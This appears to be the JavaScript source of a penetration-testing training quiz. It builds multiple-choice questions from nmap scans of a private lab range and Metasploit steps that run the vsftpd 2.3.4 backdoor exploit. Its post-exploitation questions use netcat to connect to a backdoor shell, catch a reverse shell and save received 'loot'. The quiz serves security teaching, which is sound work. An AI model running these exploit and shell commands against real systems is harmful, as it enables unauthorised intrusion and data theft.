const CYBER_TARGET = "192.168.56.102";
const CYBER_SUBNET = "192.168.56.0/24";
const CYBER_GATEWAY = "192.168.56.1";
const CYBER_TARGETS_FILE = "targets.txt";
const CYBER_VSFTPD_MODULE = "exploit/unix/ftp/vsftpd_234_backdoor";

const CYBER_COMMANDS = {
  ping: `ping ${CYBER_TARGET}`,
  scanBasic: `nmap ${CYBER_TARGET}`,
  scan80: `nmap -p 80 ${CYBER_TARGET}`,
  scanWeb: `nmap -p 80,443 ${CYBER_TARGET}`,
  scanServices: `nmap -p 21,22,80 ${CYBER_TARGET}`,
  scanAllKey: `nmap -p 21,22,80,139,445 ${CYBER_TARGET}`,
  scanSubnet: `nmap ${CYBER_SUBNET}`,
  scanSubnetExclude: `nmap ${CYBER_SUBNET} --exclude ${CYBER_GATEWAY}`,
  scanFromFile: `nmap -iL ${CYBER_TARGETS_FILE}`,
  scanFileWeb: `nmap -iL ${CYBER_TARGETS_FILE} -p 80,443`,
  version: `nmap -sV ${CYBER_TARGET}`,
  versionFTP: `nmap -sV -p 21 ${CYBER_TARGET}`,
  versionWeb: `nmap -sV -p 80 ${CYBER_TARGET}`,
  versionSMB: `nmap -sV -p 139,445 ${CYBER_TARGET}`,
  os: `nmap -O ${CYBER_TARGET}`,
  syn: `nmap -sS -T4 ${CYBER_TARGET}`,
  connect: `nmap -sT ${CYBER_TARGET}`,
  udp53: `nmap -sU -p 53 ${CYBER_TARGET}`,
  udpEnum: `nmap -sU -p 53,161 ${CYBER_TARGET}`,
  outputNormal: `nmap -oN scan.txt ${CYBER_TARGET}`,
  outputXml: `nmap -oX scan.xml ${CYBER_TARGET}`,
  outputAll: `nmap -oA corp-scan ${CYBER_SUBNET}`,
  searchVsftpd: "searchsploit vsftpd 2.3.4",
  searchSamba: "searchsploit samba",
  msfconsole: "msfconsole",
  msfSearchVsftpd: "search vsftpd",
  msfSearchSamba: "search samba",
  msfUseVsftpd: `use ${CYBER_VSFTPD_MODULE}`,
  msfSetRhosts: `set RHOSTS ${CYBER_TARGET}`,
  msfRun: "run",
  ncSmtp: `nc -nv ${CYBER_TARGET} 25`,
  ncPort6200: `nc -nv ${CYBER_TARGET} 6200`,
  ncListener: "nc -lvnp 4444",
  ncBind: `nc -nv ${CYBER_TARGET} 4444`,
  ncFileListener: "nc -lvnp 9001 > loot.txt",
  ssh: `ssh msfadmin@${CYBER_TARGET}`,
  telnet: `telnet ${CYBER_TARGET} 23`,
  ehlo: "EHLO lab.local",
  mailFrom: "MAIL FROM:<kali@lab.local>",
  rcptTo: "RCPT TO:<admin@lab.local>",
  data: "DATA",
  quit: "QUIT"
};

const CYBER_SECTION_CARDS = [
  { id: "recon", order: "Stage 1", title: "Recon & Scanning", copy: "Map ports, targets, and scope before you go deeper." },
  { id: "enum", order: "Stage 2", title: "Enumeration & Analysis", copy: "Turn open ports into service, version, and protocol evidence." },
  { id: "exploit", order: "Stage 3", title: "Exploitation", copy: "Move from verified findings to a controlled exploit path." },
  { id: "post", order: "Stage 4", title: "Post-Exploit / Access", copy: "Catch shells, use access methods, and handle follow-through." }
];

const OPTION_POOLS = {
  recon: [
    CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.scan80, CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.scanServices,
    CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.scanSubnetExclude, CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.scanFileWeb,
    CYBER_COMMANDS.syn, CYBER_COMMANDS.connect, CYBER_COMMANDS.udp53, CYBER_COMMANDS.outputNormal,
    CYBER_COMMANDS.outputXml, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.version
  ],
  enum: [
    CYBER_COMMANDS.version, CYBER_COMMANDS.versionFTP, CYBER_COMMANDS.versionWeb, CYBER_COMMANDS.versionSMB,
    CYBER_COMMANDS.os, CYBER_COMMANDS.udpEnum, CYBER_COMMANDS.ncSmtp, CYBER_COMMANDS.ehlo,
    CYBER_COMMANDS.outputXml, CYBER_COMMANDS.scanFileWeb, CYBER_COMMANDS.scanServices, CYBER_COMMANDS.scanBasic
  ],
  exploit: [
    CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.searchSamba, CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.msfSearchVsftpd,
    CYBER_COMMANDS.msfSearchSamba, CYBER_COMMANDS.msfUseVsftpd, CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.msfRun,
    CYBER_COMMANDS.versionFTP, CYBER_COMMANDS.versionSMB, CYBER_COMMANDS.ncPort6200, CYBER_COMMANDS.ncListener
  ],
  post: [
    CYBER_COMMANDS.ssh, CYBER_COMMANDS.telnet, CYBER_COMMANDS.ncListener, CYBER_COMMANDS.ncBind,
    CYBER_COMMANDS.ncFileListener, CYBER_COMMANDS.ehlo, CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.rcptTo,
    CYBER_COMMANDS.data, CYBER_COMMANDS.quit, CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputAll
  ]
};

function shuffle(items) {
  const copy = [...items];
  for (let i = copy.length - 1; i > 0; i -= 1) {
    const j = Math.floor(Math.random() * (i + 1));
    [copy[i], copy[j]] = [copy[j], copy[i]];
  }
  return copy;
}

function buildOptions(correct, poolKey, extras = []) {
  const pool = OPTION_POOLS[poolKey] || [];
  const options = [correct];
  extras.forEach((item) => {
    if (item && !options.includes(item)) options.push(item);
  });
  pool.forEach((item) => {
    if (!options.includes(item) && options.length < 4) options.push(item);
  });
  return shuffle(options.slice(0, 4));
}

function makeChoice(section, level, question, context, correct, hint, explanation, poolKey, extras = []) {
  return { section, level, question, context, options: buildOptions(correct, poolKey, extras), correct, hint, explanation };
}

function makeFlag(section, level, question, context, options, correct, hint, explanation) {
  return { section, level, question, context, options: shuffle(options), correct, hint, explanation };
}

function makeWorkflow(name, section, level, description, steps) {
  return { name, section, level, description, steps };
}
const scenarioQuestions = [
  makeChoice("recon", "beginner", "You have a single target IP and need the first useful look at exposed ports.", `Start with ${CYBER_TARGET} before you narrow anything.`, CYBER_COMMANDS.scanBasic, "Use the tool built for initial port discovery.", "A plain Nmap scan gives you the first attack-surface view before you narrow or exploit.", "recon", [CYBER_COMMANDS.ssh, CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.ncSmtp]),
  makeChoice("recon", "beginner", "You only care about TCP port 80 on the target host.", "Keep the scan tightly scoped.", CYBER_COMMANDS.scan80, "Specify the single web port directly.", "A single-port scan is faster and cleaner when the scope is just port 80.", "recon", [CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.udp53, CYBER_COMMANDS.outputXml]),
  makeChoice("recon", "beginner", "You want to check whether common web ports are open.", "Focus on HTTP and HTTPS only.", CYBER_COMMANDS.scanWeb, "Choose the command that targets both web ports.", "Scanning 80 and 443 directly keeps the work focused on web exposure.", "recon", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.scanServices, CYBER_COMMANDS.version]),
  makeChoice("recon", "beginner", "You need to test ports 21, 22, and 80 because those are the likely services in scope.", "Use one focused command.", CYBER_COMMANDS.scanServices, "List the ports after the port-selection flag.", "A focused multi-port scan is the right move when you already know which services matter.", "recon", [CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.scanAllKey]),
  makeChoice("recon", "beginner", "You have several hosts saved in a file and want Nmap to read them directly.", `The file is ${CYBER_TARGETS_FILE}.`, CYBER_COMMANDS.scanFromFile, "Use the Nmap option that loads targets from a file.", "When the target list already exists, -iL is the correct way to scan it.", "recon", [CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.connect]),
  makeChoice("recon", "beginner", "You need to scan the whole local subnet.", `Use the CIDR ${CYBER_SUBNET}.`, CYBER_COMMANDS.scanSubnet, "Point Nmap at the subnet range itself.", "A subnet scan is the right way to map hosts across the local lab range.", "recon", [CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.outputNormal]),
  makeChoice("recon", "intermediate", "You want to scan the subnet but deliberately skip the gateway.", `Exclude ${CYBER_GATEWAY}.`, CYBER_COMMANDS.scanSubnetExclude, "Use the exclusion flag with the subnet target.", "Excluding the gateway keeps the scan clean and avoids touching the infrastructure device.", "recon", [CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.syn]),
  makeChoice("recon", "intermediate", "You want a fast SYN scan with a more aggressive timing profile in the lab.", "Use one command that combines both ideas.", CYBER_COMMANDS.syn, "Combine the SYN scan type with a faster timing template.", "A SYN scan with -T4 is a common lab choice when you want quick TCP recon.", "recon", [CYBER_COMMANDS.connect, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.outputXml]),
  makeChoice("recon", "intermediate", "Raw sockets are unavailable and you still need a TCP scan.", "Pick the full TCP connect method.", CYBER_COMMANDS.connect, "Choose the scan type that completes the handshake.", "A TCP connect scan is the practical fallback when SYN scanning is not available.", "recon", [CYBER_COMMANDS.syn, CYBER_COMMANDS.udp53, CYBER_COMMANDS.os]),
  makeChoice("recon", "intermediate", "The target may expose DNS over UDP and you want to test only that service.", "Keep the scan limited to UDP port 53.", CYBER_COMMANDS.udp53, "Use the UDP scan type with the DNS port.", "A targeted UDP scan of port 53 is the practical way to check DNS without broad UDP noise.", "recon", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.connect, CYBER_COMMANDS.outputNormal]),
  makeChoice("enum", "beginner", "Port 21 is open and you need the exact FTP service version.", "Focus on the FTP port before researching exploits.", CYBER_COMMANDS.versionFTP, "Use service version detection on the FTP port.", "Version evidence is what turns an open FTP port into a credible exploit lead.", "enum", [CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.scanServices]),
  makeChoice("enum", "beginner", "A web server answered on port 80 and you want the precise service version.", "Stay focused on the web port.", CYBER_COMMANDS.versionWeb, "Use version detection against port 80.", "Versioning the web service gives you usable evidence instead of just an open port number.", "enum", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.os]),
  makeChoice("enum", "beginner", "You want broad service version visibility across the host before you choose a target service.", "Do not narrow to one port yet.", CYBER_COMMANDS.version, "Use the general service-version option across the host.", "A full version sweep is the right bridge between initial discovery and exploit research.", "enum", [CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.os, CYBER_COMMANDS.outputNormal]),
  makeChoice("enum", "beginner", "You want operating system clues from the target after confirming it responds to scans.", "Use the host fingerprinting feature.", CYBER_COMMANDS.os, "Pick the OS detection option.", "OS detection adds host-level context that helps you judge which exploit paths make sense.", "enum", [CYBER_COMMANDS.version, CYBER_COMMANDS.syn, CYBER_COMMANDS.outputXml]),
  makeChoice("enum", "intermediate", "Ports 139 and 445 are open and you need to know whether SMB looks outdated.", "Target the SMB-related ports only.", CYBER_COMMANDS.versionSMB, "Use version detection against the SMB ports.", "Checking SMB versions first is what justifies any later search for Samba exploits.", "enum", [CYBER_COMMANDS.scanAllKey, CYBER_COMMANDS.searchSamba, CYBER_COMMANDS.os]),
  makeChoice("enum", "intermediate", "You have a target file and only want to test common web exposure across it.", `Use ${CYBER_TARGETS_FILE} and limit the scope to 80 and 443.`, CYBER_COMMANDS.scanFileWeb, "Keep the file input and narrow the port list at the same time.", "Combining -iL with the web port list is the practical way to scale focused web checks.", "enum", [CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.version]),
  makeChoice("enum", "intermediate", "DNS and SNMP are the likely UDP services and you want to check both directly.", "Use a targeted UDP scan, not a broad sweep.", CYBER_COMMANDS.udpEnum, "Pick the UDP command that names both ports.", "A targeted UDP check on the likely ports reduces noise while still testing the right services.", "enum", [CYBER_COMMANDS.udp53, CYBER_COMMANDS.scanServices, CYBER_COMMANDS.outputNormal]),
  makeChoice("enum", "intermediate", "You want the scan results in XML so another tool can parse them.", "Choose the machine-friendly output format.", CYBER_COMMANDS.outputXml, "Pick the structured output option.", "XML output is the right fit when the results will be consumed by other tools or scripts.", "enum", [CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.version]),
  makeChoice("enum", "advanced", "SMTP is open and you want to inspect the banner and talk to the service manually.", "Use a direct TCP client rather than another scan.", CYBER_COMMANDS.ncSmtp, "Connect straight to the service port.", "Netcat is the right tool when you want live protocol interaction instead of passive scan output.", "enum", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.ssh, CYBER_COMMANDS.telnet]),
  makeChoice("enum", "advanced", "The SMTP banner is visible and the server is waiting for your first protocol line.", "Start the conversation correctly.", CYBER_COMMANDS.ehlo, "Use the SMTP greeting command.", "EHLO is the right opening move once the banner appears because it starts the SMTP session cleanly.", "enum", [CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.data, CYBER_COMMANDS.quit]),
  makeChoice("exploit", "beginner", "You confirmed a service looks like vsftpd 2.3.4 and want to check exploit references locally first.", "Use the local exploit search workflow before jumping into Metasploit.", CYBER_COMMANDS.searchVsftpd, "Search the local exploit database by version.", "Local exploit search is a fast way to validate whether the exact service version is worth pursuing.", "exploit", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.versionFTP, CYBER_COMMANDS.ncPort6200]),
  makeChoice("exploit", "beginner", "You now want to move into framework-assisted exploitation.", "Open the framework first.", CYBER_COMMANDS.msfconsole, "Launch the exploitation console.", "Metasploit work starts in msfconsole. You need the framework running before you can search or load modules.", "exploit", [CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.ssh]),
  makeChoice("exploit", "beginner", "Inside Metasploit, you want to see whether a vsftpd module exists.", "Search before selecting anything.", CYBER_COMMANDS.msfSearchVsftpd, "Use the framework search command first.", "Searching the module database tells you whether the exploit path exists and what the module is called.", "exploit", [CYBER_COMMANDS.msfUseVsftpd, CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.msfRun]),
  makeChoice("exploit", "beginner", "You found the correct vsftpd module in Metasploit and want to load it.", "Select the module before setting options.", CYBER_COMMANDS.msfUseVsftpd, "Use the command that loads the exploit module.", "The use command activates the module so you can configure and run it.", "exploit", [CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.msfRun]),
  makeChoice("exploit", "beginner", "The exploit module is loaded. What should you configure next so Metasploit knows which host to attack?", `Point it at ${CYBER_TARGET}.`, CYBER_COMMANDS.msfSetRhosts, "Set the remote host option.", "RHOSTS is the setting that tells the module which target to attack.", "exploit", [CYBER_COMMANDS.msfRun, CYBER_COMMANDS.versionFTP, CYBER_COMMANDS.searchVsftpd]),
  makeChoice("exploit", "beginner", "The module and target are configured. What action launches the exploit?", "You are ready to execute.", CYBER_COMMANDS.msfRun, "Run the prepared module.", "Once the module and target are set, run is the command that actually executes the exploit.", "exploit", [CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.msfSearchVsftpd, CYBER_COMMANDS.ncListener]),
  makeChoice("exploit", "intermediate", "Ports 139 and 445 are open and you want exploit references before you open Metasploit.", "Start with local research, not the framework.", CYBER_COMMANDS.searchSamba, "Use the local exploit search tool for Samba.", "A local exploit search is a quick way to see whether the observed service has known exploit material.", "exploit", [CYBER_COMMANDS.msfSearchSamba, CYBER_COMMANDS.versionSMB, CYBER_COMMANDS.outputXml]),
  makeChoice("exploit", "intermediate", "You are already in Metasploit and need Samba-related modules.", "Stay inside the framework for the search step.", CYBER_COMMANDS.msfSearchSamba, "Use Metasploit's search command.", "Inside Metasploit, the search command is the right way to find candidate modules.", "exploit", [CYBER_COMMANDS.searchSamba, CYBER_COMMANDS.msfRun, CYBER_COMMANDS.scanBasic]),
  makeChoice("exploit", "advanced", "The vsftpd backdoor appears to have opened a shell on port 6200 and you want to verify it.", "Connect to the expected backdoor port directly.", CYBER_COMMANDS.ncPort6200, "Use a direct TCP connection to port 6200.", "A direct Netcat connection is the practical way to prove whether the backdoor shell is actually listening.", "exploit", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.msfRun, CYBER_COMMANDS.telnet]),
  makeChoice("exploit", "advanced", "You expect a reverse shell and want your box ready before triggering the exploit.", "Prepare the receiving side first.", CYBER_COMMANDS.ncListener, "Set up a local listener before the callback.", "A reverse shell needs somewhere to land. If you do not listen first, the callback fails.", "exploit", [CYBER_COMMANDS.ncBind, CYBER_COMMANDS.ssh, CYBER_COMMANDS.msfconsole]),
  makeChoice("post", "beginner", "You already have valid credentials and want the safest normal remote shell into the target.", "Prefer the secure administration path.", CYBER_COMMANDS.ssh, "Choose the encrypted remote shell option.", "SSH is the right choice for credentialed remote access because it protects the session.", "post", [CYBER_COMMANDS.telnet, CYBER_COMMANDS.ncBind, CYBER_COMMANDS.ncSmtp]),
  makeChoice("post", "beginner", "Both SSH and Telnet are open, but the network is not trusted and credentials matter.", "Choose the safer service.", CYBER_COMMANDS.ssh, "Use the encrypted service, not the plain-text one.", "Telnet exposes credentials and commands. SSH is the correct path when security matters.", "post", [CYBER_COMMANDS.telnet, CYBER_COMMANDS.ncListener, CYBER_COMMANDS.outputNormal]),
  makeChoice("post", "beginner", "You expect the compromised host to connect back to your system on TCP 4444.", "Prepare the receiving socket on your own machine.", CYBER_COMMANDS.ncListener, "Listen locally before the callback happens.", "A reverse shell callback only works if your machine is already listening when the target tries to connect.", "post", [CYBER_COMMANDS.ncBind, CYBER_COMMANDS.ssh, CYBER_COMMANDS.msfRun]),
  makeChoice("post", "beginner", "The target is already exposing a bind shell on TCP 4444 and you want to reach it directly.", "This is not a callback scenario.", CYBER_COMMANDS.ncBind, "Connect outward to the target's listening port.", "A bind shell means the target is already listening. Your role is to connect to it.", "post", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.ssh, CYBER_COMMANDS.telnet]),
  makeChoice("post", "intermediate", "During a manual SMTP session, EHLO has succeeded and you want to set the sender address.", "Advance the SMTP flow correctly.", CYBER_COMMANDS.mailFrom, "The sender is defined before the recipient.", "MAIL FROM sets the envelope sender and must come before recipient selection or message content.", "post", [CYBER_COMMANDS.rcptTo, CYBER_COMMANDS.data, CYBER_COMMANDS.quit]),
  makeChoice("post", "intermediate", "The SMTP server accepted MAIL FROM. What should you send next if you want to target a mailbox?", "Move to the recipient stage.", CYBER_COMMANDS.rcptTo, "Specify the recipient before entering message content.", "RCPT TO tells the server who should receive the message and comes before DATA.", "post", [CYBER_COMMANDS.data, CYBER_COMMANDS.quit, CYBER_COMMANDS.ehlo]),
  makeChoice("post", "intermediate", "The SMTP recipient was accepted. What command comes before typing the message body?", "Switch the protocol into content mode.", CYBER_COMMANDS.data, "Use the SMTP content-entry verb.", "DATA tells the SMTP server that message content is about to follow.", "post", [CYBER_COMMANDS.quit, CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.rcptTo]),
  makeChoice("post", "intermediate", "You finished your manual SMTP test and want to close the session cleanly.", "End the protocol conversation instead of just dropping the socket.", CYBER_COMMANDS.quit, "Use the protocol's clean exit command.", "QUIT closes the SMTP session properly and avoids leaving the server waiting for more input.", "post", [CYBER_COMMANDS.data, CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.rcptTo]),
  makeChoice("post", "advanced", "You expect the target to send you a file over Netcat and want the contents written directly into a local file.", "Your listener should also redirect output.", CYBER_COMMANDS.ncFileListener, "Use a listening socket and redirect the incoming stream into a file.", "A Netcat listener with output redirected to a file is the cleanest way to receive and save the incoming data.", "post", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.ncBind, CYBER_COMMANDS.outputAll]),
  makeChoice("post", "advanced", "You already have access and want a final scan artifact preserved in a format teammates can read quickly.", "Choose the readable report format.", CYBER_COMMANDS.outputNormal, "Pick the human-readable output option.", "A normal text report is the easiest scan artifact to share and review after the technical work is complete.", "post", [CYBER_COMMANDS.outputXml, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.ssh])
];

const commandQuestions = [
  makeChoice("recon", "beginner", "Run a basic scan against the target host.", "Start with a general port view.", CYBER_COMMANDS.scanBasic, "Use Nmap with just the host.", "A plain Nmap scan is the standard first move for general discovery.", "recon", [CYBER_COMMANDS.version, CYBER_COMMANDS.ssh, CYBER_COMMANDS.msfconsole]),
  makeChoice("recon", "beginner", "Scan only TCP port 80 on the target.", "Keep the scope tight.", CYBER_COMMANDS.scan80, "Specify the exact port with -p.", "A single-port scan is the right choice when only one service matters.", "recon", [CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.scanServices, CYBER_COMMANDS.udp53]),
  makeChoice("recon", "beginner", "Scan ports 21, 22, and 80 on the target.", "Use one focused command.", CYBER_COMMANDS.scanServices, "List the ports after the port flag.", "Nmap accepts a comma-separated list after -p for focused multi-port work.", "recon", [CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.scanWeb, CYBER_COMMANDS.scanAllKey]),
  makeChoice("recon", "beginner", "Scan the full lab subnet.", `Use ${CYBER_SUBNET}.`, CYBER_COMMANDS.scanSubnet, "Point Nmap at the subnet CIDR.", "The subnet CIDR tells Nmap to walk the full local range.", "recon", [CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.outputAll]),
  makeChoice("recon", "beginner", "Read targets from targets.txt.", "Use the Nmap file-input flag.", CYBER_COMMANDS.scanFromFile, "Use the input-list option.", "-iL is the correct way to feed Nmap a prepared list of targets.", "recon", [CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.os]),
  makeChoice("recon", "intermediate", "Scan the subnet but exclude the gateway.", `Exclude ${CYBER_GATEWAY}.`, CYBER_COMMANDS.scanSubnetExclude, "Use the exclusion option with the subnet target.", "--exclude removes the gateway from scope while the rest of the scan continues.", "recon", [CYBER_COMMANDS.scanSubnet, CYBER_COMMANDS.scanFromFile, CYBER_COMMANDS.scanBasic]),
  makeChoice("recon", "intermediate", "Run a fast SYN scan with a higher timing profile.", "Combine the right scan type and timing flag.", CYBER_COMMANDS.syn, "Use -sS with a quicker timing template.", "-sS with -T4 is a practical lab combination for fast TCP recon.", "recon", [CYBER_COMMANDS.connect, CYBER_COMMANDS.version, CYBER_COMMANDS.outputNormal]),
  makeChoice("recon", "intermediate", "Run a UDP scan against DNS port 53.", "Test only the DNS UDP service.", CYBER_COMMANDS.udp53, "Use the UDP scan type with port 53.", "-sU on port 53 is the practical targeted check for DNS over UDP.", "recon", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.connect, CYBER_COMMANDS.os]),
  makeChoice("enum", "beginner", "Detect service versions on the target host.", "You need more than open-port numbers.", CYBER_COMMANDS.version, "Use the service-version flag.", "-sV turns a port list into actual service and version evidence.", "enum", [CYBER_COMMANDS.scanBasic, CYBER_COMMANDS.os, CYBER_COMMANDS.outputNormal]),
  makeChoice("enum", "beginner", "Identify the FTP service version on port 21 only.", "Keep the scan scoped to FTP.", CYBER_COMMANDS.versionFTP, "Use version detection with the FTP port.", "Versioning the FTP port is the right step before exploit research.", "enum", [CYBER_COMMANDS.version, CYBER_COMMANDS.scanServices, CYBER_COMMANDS.searchVsftpd]),
  makeChoice("enum", "beginner", "Identify the web service version on port 80.", "Target the web port directly.", CYBER_COMMANDS.versionWeb, "Use version detection against port 80.", "A focused service version check on port 80 reveals the web software you are actually dealing with.", "enum", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.os]),
  makeChoice("enum", "intermediate", "Run OS detection against the host.", "You want host-level fingerprinting.", CYBER_COMMANDS.os, "Pick the OS detection flag.", "Operating system detection adds context that supports later exploit decisions.", "enum", [CYBER_COMMANDS.version, CYBER_COMMANDS.syn, CYBER_COMMANDS.outputAll]),
  makeChoice("enum", "intermediate", "Save the scan as a normal text report.", "Create a human-readable file.", CYBER_COMMANDS.outputNormal, "Choose the normal output format.", "A normal text report is the simplest output for quick review or note-taking.", "enum", [CYBER_COMMANDS.outputXml, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.version]),
  makeChoice("enum", "intermediate", "Save the scan in XML format.", "This output will be parsed later.", CYBER_COMMANDS.outputXml, "Choose the structured output format.", "XML is the right output type when another tool needs to ingest the results.", "enum", [CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputAll, CYBER_COMMANDS.scanBasic]),
  makeChoice("enum", "intermediate", "Save all standard output families under one base name.", "Keep one command for several report styles.", CYBER_COMMANDS.outputAll, "Use the all-output option.", "-oA preserves several useful report formats at once.", "enum", [CYBER_COMMANDS.outputNormal, CYBER_COMMANDS.outputXml, CYBER_COMMANDS.scanSubnet]),
  makeChoice("enum", "advanced", "Connect directly to SMTP on port 25 so you can interact manually.", "Use a TCP client rather than another scan.", CYBER_COMMANDS.ncSmtp, "Use Netcat to connect to the SMTP port.", "Netcat gives you a live TCP session to the service so you can work through the protocol manually.", "enum", [CYBER_COMMANDS.scan80, CYBER_COMMANDS.ssh, CYBER_COMMANDS.telnet]),
  makeChoice("exploit", "beginner", "Search the local exploit database for vsftpd 2.3.4.", "Use the exploit lookup tool, not the framework yet.", CYBER_COMMANDS.searchVsftpd, "Use searchsploit with the service and version.", "searchsploit is the right first research tool for a specific service/version pair.", "exploit", [CYBER_COMMANDS.msfconsole, CYBER_COMMANDS.versionFTP, CYBER_COMMANDS.ncPort6200]),
  makeChoice("exploit", "beginner", "Launch the Metasploit console.", "You are moving into framework-based exploitation.", CYBER_COMMANDS.msfconsole, "Open the framework first.", "msfconsole is the entry point for Metasploit searching, module loading, and execution.", "exploit", [CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.ssh, CYBER_COMMANDS.scanBasic]),
  makeChoice("exploit", "beginner", "Search Metasploit for vsftpd-related modules.", "Assume you are already inside msfconsole.", CYBER_COMMANDS.msfSearchVsftpd, "Use the framework search command.", "The framework search step tells you whether the right module exists and how to reference it.", "exploit", [CYBER_COMMANDS.msfUseVsftpd, CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.msfRun]),
  makeChoice("exploit", "beginner", "Load the vsftpd backdoor exploit module.", "Select the module before setting options.", CYBER_COMMANDS.msfUseVsftpd, "Use the command that loads a module.", "The use command activates the exploit module so you can configure it.", "exploit", [CYBER_COMMANDS.msfSearchVsftpd, CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.msfRun]),
  makeChoice("exploit", "beginner", "Set the remote target host for the loaded module.", `Use ${CYBER_TARGET}.`, CYBER_COMMANDS.msfSetRhosts, "Set the remote host option.", "RHOSTS tells the exploit module exactly which host to attack.", "exploit", [CYBER_COMMANDS.msfRun, CYBER_COMMANDS.searchVsftpd, CYBER_COMMANDS.versionFTP]),
  makeChoice("exploit", "beginner", "Launch the configured module.", "The exploit and target are already prepared.", CYBER_COMMANDS.msfRun, "Execute the current module.", "run is the step that actually launches the loaded and configured module.", "exploit", [CYBER_COMMANDS.msfSetRhosts, CYBER_COMMANDS.msfSearchVsftpd, CYBER_COMMANDS.ncListener]),
  makeChoice("exploit", "intermediate", "Search for Samba exploit references locally.", "You want research before framework work.", CYBER_COMMANDS.searchSamba, "Use the local exploit search tool for Samba.", "Local exploit search is the fastest way to see whether the observed service has known exploit material.", "exploit", [CYBER_COMMANDS.msfSearchSamba, CYBER_COMMANDS.versionSMB, CYBER_COMMANDS.outputXml]),
  makeChoice("exploit", "advanced", "Connect directly to the expected backdoor shell on port 6200.", "Verify whether the exploit really opened the shell.", CYBER_COMMANDS.ncPort6200, "Use Netcat to connect to the expected backdoor port.", "A direct TCP connection to port 6200 is the practical verification step after a vsftpd backdoor trigger.", "exploit", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.telnet, CYBER_COMMANDS.msfRun]),
  makeChoice("post", "beginner", "Start a Netcat listener on TCP 4444.", "You are waiting for a reverse shell callback.", CYBER_COMMANDS.ncListener, "Use Netcat in listen mode on the chosen port.", "A reverse shell needs your machine listening before the target calls back.", "post", [CYBER_COMMANDS.ncBind, CYBER_COMMANDS.ssh, CYBER_COMMANDS.outputNormal]),
  makeChoice("post", "beginner", "Connect to a bind shell already listening on TCP 4444 on the target.", "This is a direct outbound connection.", CYBER_COMMANDS.ncBind, "Connect to the remote listening port, do not open another local listener.", "A bind shell means the target is listening and you need to connect to it.", "post", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.telnet, CYBER_COMMANDS.msfconsole]),
  makeChoice("post", "beginner", "Open a secure remote shell with the msfadmin account.", `Use ${CYBER_TARGET} as the host.`, CYBER_COMMANDS.ssh, "Use the encrypted remote-login tool.", "SSH is the right choice for a normal secure remote shell when you already have credentials.", "post", [CYBER_COMMANDS.telnet, CYBER_COMMANDS.ncBind, CYBER_COMMANDS.ncSmtp]),
  makeChoice("post", "intermediate", "Receive a file over Netcat and save it as loot.txt.", "Set up the listener and redirect output.", CYBER_COMMANDS.ncFileListener, "Use a listener plus output redirection.", "A Netcat listener with redirection captures the incoming file directly into a local artifact.", "post", [CYBER_COMMANDS.ncListener, CYBER_COMMANDS.ncBind, CYBER_COMMANDS.outputAll]),
  makeChoice("post", "intermediate", "Send the first SMTP command after the banner to identify your client.", "Start the protocol conversation correctly.", CYBER_COMMANDS.ehlo, "Use the SMTP greeting verb.", "EHLO is the proper first SMTP command after the service banner appears.", "post", [CYBER_COMMANDS.mailFrom, CYBER_COMMANDS.data, CYBER_COMMANDS.quit]),
  makeChoice("post", "intermediate", "Set the sender address during the SMTP interaction.", "This happens after EHLO succeeds.", CYBER_COMMANDS.mailFrom, "Define the sender before the recipient.", "MAIL FROM establishes the envelope sender and comes before recipient selection.", "post", [CYBER_COMMANDS.rcptTo, CYBER_COMMANDS.data, CYBER_COMMANDS.quit]),
